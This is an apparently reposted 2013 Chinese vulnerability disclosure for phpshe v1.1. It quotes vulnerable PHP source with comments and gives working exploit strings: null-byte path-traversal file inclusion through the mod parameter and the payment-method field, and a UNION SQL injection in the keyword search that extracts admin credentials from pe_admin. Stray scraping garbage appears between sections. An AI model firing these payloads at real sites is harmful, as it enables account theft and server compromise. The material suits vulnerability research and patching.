
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-19 19:01:54
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体大概参数传输

//common.php
// common.php (excerpt quoted by the write-up): request data is flattened into
// global variables. Every $_GET key becomes $_g_<key>, every $_POST key
// $_p_<key>, every $_SESSION key $_s_<key> and every $_COOKIE key $_c_<key>.
// The only processing on the way in is pe_trim()/pe_stripslashes() (not shown);
// the module code below interpolates these variables straight into SQL and
// include paths, which is what the findings in this write-up rely on.
// Note: get_magic_quotes_gpc() no longer exists in PHP 8, so this branch only
// matters on the PHP versions phpshe 1.1 targeted.
if (get_magic_quotes_gpc()) {
    // Magic quotes are undone first so the extracted values are the raw input.
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookie values are extracted the same way (prefix _c); index.php below passes
// $_c_cart_list, i.e. client-supplied cookie data, to unserialize().
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
; }! I* b: P8 C! a3 \2 J/ W* s+ e( |
0x01 包含漏洞

//首页文件
<?php
// Front controller (index.php) as quoted by the write-up. common.php populates
// the $_g_/$_p_/$_s_/$_c_ variables and the $module/$mod/$act routing variables
// used below.
include('common.php');
// Cached lookups handed to the templates.
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// Cart count: read from the database for a logged-in user, otherwise from the
// cart_list cookie, which is unserialize()d twice. The cookie is client data
// (see the $_COOKIE extract in common.php); a JSON or integer-only cookie
// would avoid feeding untrusted input to unserialize().
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// $mod and $module come from the request (routing excerpt in common.php below)
// and are interpolated into the include path without being checked, so the
// included file can be steered outside module/. The author calls this a
// "weak" (鸡肋) inclusion bug. Mitigation: resolve $module/$mod against an
// allow-list of known modules/actions before building the path.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
url路由配置
// common.php, from line 15: URL routing. $mod, $act and $id are taken from
// $_POST first, then $_GET, using truthiness (`?:`), so an empty or "0" value
// falls through to the default. No allow-list or character check is applied,
// which is why $mod can carry path components into the include() in index.php.
// Mitigation: accept only values matching a fixed set of module/action names
// (e.g. a strict in_array() check) and cast $id to int where it is numeric.
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// Unlike $mod/$act, $id has no default on the line above, so the fallback
// reads an undefined $id (notice-level warning, value null).
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%000 M6 t! c1 i' ?8 F* U# ?

0x02 搜索注入
<code id="code2">

//product.php 文件
case 'list':
    // Product listing for one category, with keyword search and ordering.
    // This is one arm of a switch whose enclosing statement is not quoted here.
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // Search: build the WHERE tail as a raw string.
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // $category_id is already intval()'d, so this branch is numeric-safe.
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // $_g_keyword is the raw GET parameter (see common.php) interpolated into
    // the LIKE clause with no SQL escaping — this is the injection the write-up
    // demonstrates. Mitigation: bind the value as a query parameter (or at
    // minimum escape it with the driver's quoting function), and escape the
    // LIKE wildcards % and _ if they are not meant to be user-controlled.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    // $_g_orderby is split into column suffix and direction and interpolated
    // the same way; both parts should be checked against an allow-list of
    // column names and 'asc'/'desc' before use.
    if ($_g_orderby) {
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // Presumably 16 rows per page, with $_g_page as the page number — pe_selectall()
    // forwards the array to sql_selectall() (not shown), so confirm how $_g_page is handled.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // Best-seller ranking.
    $product_hotlist = product_hotlist();
    // Current breadcrumb path.
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进 selectall 函数库
/**
 * Fetch every row of `dbpre.$table` that satisfies $where.
 *
 * @param string       $table      table name without the dbpre prefix
 * @param string|array $where      raw condition string or column=>value array;
 *                                 normalised by $this->_dowhere() (not shown here)
 * @param string       $field      column list, interpolated verbatim into the query
 * @param array        $limit_page pagination tuple forwarded to sql_selectall()
 * @return mixed whatever sql_selectall() returns
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // Normalise the condition first, then assemble the statement by string
    // interpolation — nothing is parameterised at this layer, so a caller that
    // passes a pre-built string (product.php above) must escape it itself.
    $condition = $this->_dowhere($where);
    $query = "select {$field} from `".dbpre."{$table}` {$condition}";
    return $this->sql_selectall($query, $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1, q( a6 R3 ^& E

</code>

0x03 包含漏洞2

<code id="code3">

//order.php

case 'pay':
    // Payment step for an unpaid order. This is one arm of a switch whose
    // enclosing statement is not quoted here.
    $order_id = pe_dbhold($_g_id);
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // Payment-method configuration is stored serialized; this is cached
        // application data, not request data.
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // Flatten line breaks in the bank-transfer text for display.
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // $_p_info is the POST "info" array as extracted in common.php and is
        // handed to pe_update() unchanged; depending on what pe_update() does
        // with the array (not shown), the client decides which order columns
        // are written. Restrict it to the expected keys before the update.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // $_p_info['order_payway'] comes from the POST body and is
            // interpolated into the include path without being checked against
            // the configured payment methods — the second inclusion bug in this
            // write-up. Mitigation: accept only a key present in $cache_payway.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        } // Once the update succeeds the inclusion above is reachable ("weak" inclusion, per the author).
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>( j/ p+ y2 t1 |3 V
